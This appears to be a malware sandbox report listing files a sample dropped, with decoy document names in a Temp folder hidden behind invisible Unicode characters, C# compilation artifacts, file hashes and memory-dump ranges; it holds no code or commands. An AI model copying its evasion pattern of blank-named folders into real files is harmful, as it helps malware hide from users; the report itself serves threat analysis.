C:\Users\Admin\AppData\Local\Temp\ ‌ ‍‎  \Common Files\Documents\OpenRevoke.xlsx

Filesize
12KB

MD5
67c291c363dc4f359447874b03adb8e8

SHA1
eba134eb105d7dafc675a5f551d0400159c191b3

SHA256
df87c57c1b8c1cd2807f254703e72300ed6b2a1258ee05e141167fbe1bfb00a8

SHA512
f5bb60e0ad6ca9a0e79797d9d77003b6c25ee86fd3885fb698d1ad6bdaaab445260095497a4d70f511da23b3cedce9895f6b096935d1a805c98137ef7c65a549

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‍‎  \Common Files\Documents\RestartDisable.docx

Filesize
1.7MB

MD5
1128f586b1f0c67cbfd2c6443a736817

SHA1
dd3c100875bdfe836f2c5d95bcbd5b701885c235

SHA256
7d9ccdfcadeda8f21806f4bfa6a7de7388a28a6416998e1df3c70ba39fe5c9d9

SHA512
104d6485fc855e6ded11144299abc07cb352359327d71a95096ba58eddf7389ca548551382b86834d5acdb8e0820652972f9fddb09e8ce07d9ff2eaf63238f58

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‍‎  \Common Files\Documents\SubmitGroup.pdf

Filesize
1.4MB

MD5
8141a7b30368876992cd9737d0349f4e

SHA1
287fb175b244878fba529f56ab29739b345a6139

SHA256
5a4d8aa0e2c7fd41cd5ff640261ba0b21f55330396e6bf3e2a194820b5635b65

SHA512
aa17c472c5c30fdf57b88c0b205d7d702b78432514f8c206ec6380f41aa34ba10bc815aa132b79b1945bda1069c53ca4c1fa73c4408c4ddc0dc0ec4d200616b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‍‎  \Common Files\Downloads\BackupPop.htm

Filesize
546KB

MD5
2eb9a4b9ccc6f69b72f6a58b5c73363d

SHA1
4df28cd035b08508f094a11c4aae51ca47de7f3e

SHA256
ff768882586306e6575c82270270e6bfa263ab1a35771b1366d02cf58d85e94d

SHA512
121ed14cc58808b2d7dd36ab2834fe93902288ae8f30c06b115897bf84e70c890bedc308f27caf51603a027be3b6aa9bf166575d05d20437cd2ca4e239a66b69

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‍‎  \Common Files\Downloads\ClearJoin.txt

Filesize
494KB

MD5
8f63aac8ea0053964495b0b62c41fb96

SHA1
75db203b1600d7879777a555ad4ba78818f8b997

SHA256
b32ef550e0df3839239854a24f77b8b00a546488a7d80512f9f2de13833ae36c

SHA512
c1117e814cb6ea8b8c384eed4be3c1da38465203b5e9fccea6a4cbe6bee4f05a7d631469e3521cef8a450e6bec509a705053c15a3d394e64c47107b52c0e4c2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‍‎  \Common Files\Downloads\CloseSend.csv

Filesize
648KB

MD5
20d0766dbe7d57799b524e37704db619

SHA1
ee3cfd8b1f1b75ec508bffef024793b032f7f90d

SHA256
5e6f8621606039b4937695e1881e6d298fbbd204cbcdeda2a8ace75524d66f89

SHA512
f32d7de0adb8a4057c0628c574745266a02f60d4f586b72474bdad1ad3982e0386acf10bfce010d786865c5a36051fb4671ac8a6cfd6ccfaa9294341f93a980d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‍‎  \Common Files\Downloads\EnableBackup.vbe

Filesize
443KB

MD5
ff84b1389040a0146225fbceca1c6157

SHA1
51e41a0e69f5f37f2eb1b1072826bdf030a6a703

SHA256
960642855d3bf5994013b2ade429725f77f6c741c45544558459c3718d6df74e

SHA512
a5db098fad4f42f5d3c4ea6504fe33520e99a38369a5ea5847f6b750fe982ad7942d364e1f31241774512909c7a010d482631a49aa5ec69f02b278c9c3ad8dd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‍‎  \Common Files\Music\WatchDeny.docx

Filesize
1.1MB

MD5
4428c0bfbae0fc10a89ba59fbc55b7ee

SHA1
221adf7a24c9f8413ff0d2c75feca05ffcf77fb7

SHA256
6c041ec2b06fd2e2b2eb71dfcc420be88062af9893cad85b6549109bde6d7af9

SHA512
3187c9de215bfe5c19eab2b2c97bbc11a9bd23e4fdfe2a2fb8e2af1f8b63ba9cd87e0d28d0a4ed4912310ed4dc29c5711ea0ea950eaa7946e81226c6efb29ed1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ ‍‎  \Common Files\Pictures\ImportBackup.png

Filesize
340KB

MD5
b29ba7e30d6a1527b0be37e2d8863941

SHA1
bc489f79dc8b604a237463fec534e259bc75fc08

SHA256
e9ed46dfc9a1fc1d3162deb6d765b21c2eabef1c954a3ea0727ecda6cdf0bd79

SHA512
cddd844ec262c1524fa6bdc2c2bffb46077a3e969b77ec207bcbafa39b7becac9656b35f369b708de64ba9964a82125b9af714d6ae796f03e65f947140d10084

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5z5d2vs0\5z5d2vs0.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5z5d2vs0\5z5d2vs0.cmdline

Filesize
607B

MD5
9d263316ed517b92e489918c325e06b6

SHA1
5a630d240ddaab3c51005124774862f9dd1afca7

SHA256
94375a59f3abd51514fffa38251224949b0865bd9b60988339fd74b7036020fb

SHA512
907c1aaa5e3b02ba901b187aadc82185a6af748797055b2b6ce68312f790a742e3ac164b5e4af65763b3aaec7bdaacd9fcb8aacffde4b3af6f4fd8a878c3e91f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5z5d2vs0\CSCC9D5B7ADE0B7429BA4FF1B1D0A16E57.TMP

Filesize
652B

MD5
f01c3edd8333751ffa118c79869756c9

SHA1
b726ec0761cfca9c657991f0af2a51c84aeb048a

SHA256
709d3478fe555045dfef37c3b7ec3c3c0c1cf855c3be3a841cf4a23d6e04dcb1

SHA512
2c9170ffe670c1f81adb6102ae236d9688602d753114be3a1ce478f35996392d094e69efcbc41ee974652cd1ef412a86b1dc7544689d2be81f2baf0a2e00ecd6

Download Submit
memory/2896-82-0x000001F7E9A30000-0x000001F7E9A52000-memory.dmp

Filesize
136KB

Download
memory/4184-230-0x0000019F52E50000-0x0000019F52E58000-memory.dmp

Filesize
32KB

Download
memory/4672-299-0x00007FFEC5B60000-0x00007FFEC6089000-memory.dmp

Filesize
5.2MB

Download
memory/4672-194-0x00007FFEC6090000-0x00007FFEC620F000-memory.dmp

Filesize
1.5MB

Download
memory/4672-70-0x00007FFEC5B60000-0x00007FFEC6089000-memory.dmp

Filesize
5.2MB

Download
memory/4672-71-0x00007FFED9720000-0x00007FFED9745000-memory.dmp

Filesize
148KB

Download
memory/4672-72-0x00007FFED5CD0000-0x00007FFED5D9D000-memory.dmp

Filesize
820KB

Download
memory/4672-66-0x00007FFEC6540000-0x00007FFEC6C04000-memory.dmp

Filesize
6.8MB

Download
memory/4672-67-0x00007FFED6450000-0x00007FFED6483000-memory.dmp

Filesize
204KB

Download
memory/4672-63-0x00007FFED9700000-0x00007FFED9719000-memory.dmp

Filesize
100KB

Download
memory/4672-64-0x00007FFED6490000-0x00007FFED649D000-memory.dmp

Filesize
52KB

Download
memory/4672-60-0x00007FFEC6090000-0x00007FFEC620F000-memory.dmp

Filesize
1.5MB

Download
memory/4672-58-0x00007FFED5890000-0x00007FFED58B4000-memory.dmp

Filesize
144KB

Download
memory/4672-56-0x00007FFED5EA0000-0x00007FFED5EBA000-memory.dmp

Filesize
104KB

Download
memory/4672-54-0x00007FFED5EC0000-0x00007FFED5EED000-memory.dmp

Filesize
180KB

Download
memory/4672-48-0x00007FFED98D0000-0x00007FFED98DF000-memory.dmp

Filesize
60KB

Download
memory/4672-296-0x00007FFED6450000-0x00007FFED6483000-memory.dmp

Filesize
204KB

Download
memory/4672-30-0x00007FFED9720000-0x00007FFED9745000-memory.dmp

Filesize
148KB

Download
memory/4672-81-0x00007FFED5BB0000-0x00007FFED5CCB000-memory.dmp

Filesize
1.1MB

Download
memory/4672-25-0x00007FFEC6540000-0x00007FFEC6C04000-memory.dmp

Filesize
6.8MB

Download
memory/4672-76-0x00007FFED6420000-0x00007FFED642D000-memory.dmp

Filesize
52KB

Download
memory/4672-74-0x00007FFED6430000-0x00007FFED6444000-memory.dmp

Filesize
80KB

Download
memory/4672-168-0x00007FFED5890000-0x00007FFED58B4000-memory.dmp

Filesize
144KB

Download
memory/4672-304-0x00007FFED5CD0000-0x00007FFED5D9D000-memory.dmp

Filesize
820KB

Download
memory/4672-321-0x00007FFEC6090000-0x00007FFEC620F000-memory.dmp

Filesize
1.5MB

Download
memory/4672-315-0x00007FFEC6540000-0x00007FFEC6C04000-memory.dmp

Filesize
6.8MB

Download
memory/4672-316-0x00007FFED9720000-0x00007FFED9745000-memory.dmp

Filesize
148KB

Download
memory/4672-355-0x00007FFED6490000-0x00007FFED649D000-memory.dmp

Filesize
52KB

Download
memory/4672-361-0x00007FFEC6090000-0x00007FFEC620F000-memory.dmp

Filesize
1.5MB

Download
memory/4672-368-0x00007FFED5BB0000-0x00007FFED5CCB000-memory.dmp

Filesize
1.1MB

Download
memory/4672-367-0x00007FFED6420000-0x00007FFED642D000-memory.dmp

Filesize
52KB

Download
memory/4672-366-0x00007FFED6430000-0x00007FFED6444000-memory.dmp

Filesize
80KB

Download
memory/4672-365-0x00007FFEC5B60000-0x00007FFEC6089000-memory.dmp

Filesize
5.2MB

Download
memory/4672-364-0x00007FFED5CD0000-0x00007FFED5D9D000-memory.dmp

Filesize
820KB

Download
memory/4672-363-0x00007FFED6450000-0x00007FFED6483000-memory.dmp

Filesize
204KB

Download
memory/4672-362-0x00007FFED9700000-0x00007FFED9719000-memory.dmp

Filesize
100KB

Download
memory/4672-360-0x00007FFED5890000-0x00007FFED58B4000-memory.dmp

Filesize
144KB

Download
memory/4672-359-0x00007FFED5EA0000-0x00007FFED5EBA000-memory.dmp

Filesize
104KB

Download
memory/4672-358-0x00007FFED5EC0000-0x00007FFED5EED000-memory.dmp

Filesize
180KB

Download
memory/4672-357-0x00007FFED98D0000-0x00007FFED98DF000-memory.dmp

Filesize
60KB

Download
memory/4672-356-0x00007FFED9720000-0x00007FFED9745000-memory.dmp

Filesize
148KB

Download
memory/4672-340-0x00007FFEC6540000-0x00007FFEC6C04000-memory.dmp

Filesize
6.8MB

Download